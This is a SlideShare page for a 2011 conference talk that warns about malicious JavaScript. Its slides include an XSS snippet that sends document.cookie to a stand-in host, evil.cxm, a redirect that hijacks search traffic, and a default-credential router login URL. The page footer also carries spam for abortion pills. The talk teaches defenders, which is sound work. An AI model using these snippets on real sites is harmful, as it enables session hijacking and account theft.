SlideShare une entreprise Scribd logo
1  sur  16
JAVASCRIPT goneWILD AkashMahajan | jsFoo 2011
WARNING NSFW Don’t say I didn’t warn you. This presentation is Not Safe For Work.
Don’t worry I swear this presentation doesn’t have dirty pictures in it. No Dirty Pictures
DISCLAIMER Tech Lite This presentation is low on technical content.
Why bother? INCEPTION Planting the seed of an idea.
What is the idea? JavaScript code showing up in unexpected places can have unintended consequences. Can you have fun and profit from this somehow?
Wild Idea #1 Stealing a session cookie <script>  ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src","http://evil.cxm/cookiestealer?stolencookie" + document.cookie); document.body.appendChild(ifrm); </script> Firesheep also does session hijacking by stealing cookies in transit.
Wild Idea #1.5 One can steal username and password with JS in a login form.
Wilder Idea #2 Stealing the Google page rank  if(document.referrer == 'google')  { varlocationurl = 'http://evil.cxm/google1.php'; location.href = locationurl;     } Do you regularly check the link you get from google to your site?
Wilder Idea #2.5 What if the JavaScript redirects users to a malicious download page?
Wildest Idea #3 Login to an internal ADSL router website using a default username and password. varloginUrl = ‘http://admin:admin@192.168.1.1/’;  document.location = loginUrl; Obviously you all have changed the default password long back, right
Wildest Idea #3.5 Allowing untrusted code in the browser is not the smartest thing to do.
His WILDNESS!!! SamyKamkar wrote JS code to get more friends in MySpace.  At one point he had over a millionfriends in less than 24 hours
Jumping to conclusions JavaScript can be pretty wild if it shows up in unexpected places. The very idea that outside code is allowed execution in the browser is  radical and dangerous.
PIMPING MYSELF/ QnA AkashMahajan Web Security Consultant http://akashm.com | @makash akashmahajan@gmail.com | 9980527182
References, Attribution Image on slide 12 has been taken from a presentation by Jeremiah Grossman at Black Hat 2006 conference.  http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Grossman.pdf Image on slide 13 has been taken from http://www.flickr.com/photos/iscteiul/ . The image is available for reuse  under Creative Commons. Some Reference Links JavaScript History Stealing Attack http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html Samy is my Hero – MySpace XSS Worm http://namb.la/popular/tech.html JavaScript to steal session cookies http://jehiah.cz/a/xss-stealing-cookies-101 http://www.go4expert.com/forums/showthread.php?t=17066 http://www.criticalsecurity.net/index.php/topic/7137-how-to-make-a-cookie-stealer/ Trailer of the Movie ‘The Dirty Picture’ http://www.youtube.com/thedirtypicturefilm Ending of the movie inception explained. http://screenrant.com/inception-spoilers-discussion-kofi-68330/ 06-Grossman.pdf

Contenu connexe

Plus de Akash Mahajan

Hackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingHackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
Web application security
Web application securityWeb application security
Web application security
Akash Mahajan
 
Web application security
Web application securityWeb application security
Web application security
Akash Mahajan
 
Web application security
Web application securityWeb application security
Web application security
Akash Mahajan
 

Plus de Akash Mahajan (13)

The real incident of stealing a droid app+data
The real incident of stealing a droid app+dataThe real incident of stealing a droid app+data
The real incident of stealing a droid app+data
 
Believe It Or Not SSL Attacks
Believe It Or Not SSL AttacksBelieve It Or Not SSL Attacks
Believe It Or Not SSL Attacks
 
I haz your mouse clicks and key strokes
I haz your mouse clicks and key strokesI haz your mouse clicks and key strokes
I haz your mouse clicks and key strokes
 
Hackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingHackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web Programming
 
Secure HTTP Headers c0c0n 2011 Akash Mahajan
Secure HTTP Headers c0c0n 2011 Akash MahajanSecure HTTP Headers c0c0n 2011 Akash Mahajan
Secure HTTP Headers c0c0n 2011 Akash Mahajan
 
Php security
Php securityPhp security
Php security
 
Secure passwords-theory-and-practice
Secure passwords-theory-and-practiceSecure passwords-theory-and-practice
Secure passwords-theory-and-practice
 
Top 10 web application security risks akash mahajan
Top 10 web application security risks   akash mahajanTop 10 web application security risks   akash mahajan
Top 10 web application security risks akash mahajan
 
Web application security
Web application securityWeb application security
Web application security
 
Web application security
Web application securityWeb application security
Web application security
 
Web application security
Web application securityWeb application security
Web application security
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In Php
 
Startups Security
Startups SecurityStartups Security
Startups Security
 

Dernier

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 

Dernier (20)

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 

Javascript Gone Wild

  • 2. WARNING NSFW Don’t say I didn’t warn you. This presentation is Not Safe For Work.
  • 3. Don’t worry I swear this presentation doesn’t have dirty pictures in it. No Dirty Pictures
  • 4. DISCLAIMER Tech Lite This presentation is low on technical content.
  • 5. Why bother? INCEPTION Planting the seed of an idea.
  • 6. What is the idea? JavaScript code showing up in unexpected places can have unintended consequences. Can you have fun and profit from this somehow?
  • 7. Wild Idea #1 Stealing a session cookie <script> ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src","http://evil.cxm/cookiestealer?stolencookie" + document.cookie); document.body.appendChild(ifrm); </script> Firesheep also does session hijacking by stealing cookies in transit.
  • 8. Wild Idea #1.5 One can steal username and password with JS in a login form.
  • 9. Wilder Idea #2 Stealing the Google page rank if(document.referrer == 'google') { varlocationurl = 'http://evil.cxm/google1.php'; location.href = locationurl; } Do you regularly check the link you get from google to your site?
  • 10. Wilder Idea #2.5 What if the JavaScript redirects users to a malicious download page?
  • 11. Wildest Idea #3 Login to an internal ADSL router website using a default username and password. varloginUrl = ‘http://admin:admin@192.168.1.1/’; document.location = loginUrl; Obviously you all have changed the default password long back, right
  • 12. Wildest Idea #3.5 Allowing untrusted code in the browser is not the smartest thing to do.
  • 13. His WILDNESS!!! SamyKamkar wrote JS code to get more friends in MySpace. At one point he had over a millionfriends in less than 24 hours
  • 14. Jumping to conclusions JavaScript can be pretty wild if it shows up in unexpected places. The very idea that outside code is allowed execution in the browser is radical and dangerous.
  • 15. PIMPING MYSELF/ QnA AkashMahajan Web Security Consultant http://akashm.com | @makash akashmahajan@gmail.com | 9980527182
  • 16. References, Attribution Image on slide 12 has been taken from a presentation by Jeremiah Grossman at Black Hat 2006 conference. http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Grossman.pdf Image on slide 13 has been taken from http://www.flickr.com/photos/iscteiul/ . The image is available for reuse under Creative Commons. Some Reference Links JavaScript History Stealing Attack http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html Samy is my Hero – MySpace XSS Worm http://namb.la/popular/tech.html JavaScript to steal session cookies http://jehiah.cz/a/xss-stealing-cookies-101 http://www.go4expert.com/forums/showthread.php?t=17066 http://www.criticalsecurity.net/index.php/topic/7137-how-to-make-a-cookie-stealer/ Trailer of the Movie ‘The Dirty Picture’ http://www.youtube.com/thedirtypicturefilm Ending of the movie inception explained. http://screenrant.com/inception-spoilers-discussion-kofi-68330/ 06-Grossman.pdf